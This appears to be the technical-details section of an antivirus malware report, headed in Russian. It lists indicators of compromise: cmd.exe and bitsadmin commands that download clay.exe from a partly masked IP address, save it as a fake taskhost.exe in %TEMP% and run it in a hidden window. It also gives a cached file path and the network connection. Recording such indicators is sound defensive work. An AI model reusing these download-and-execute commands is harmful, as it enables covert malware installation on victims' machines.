Техническая информация
- '<SYSTEM32>\cmd.exe' /c bitsadmin /transfer dw /download /priority high http://52.##.242.65/watch/clay.exe %TEMP%\taskhost.exe & %TEMP%\taskhost.exe & exit
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\dyps348i\config14[1].txt
- '52.##.242.65':80
- '<SYSTEM32>\bitsadmin.exe' /transfer dw /download /priority high http://52.##.242.65/watch/clay.exe %TEMP%\taskhost.exe
- '<SYSTEM32>\cmd.exe' /c bitsadmin /transfer dw /download /priority high http://52.##.242.65/watch/clay.exe %TEMP%\taskhost.exe & %TEMP%\taskhost.exe & exit (со скрытым окном)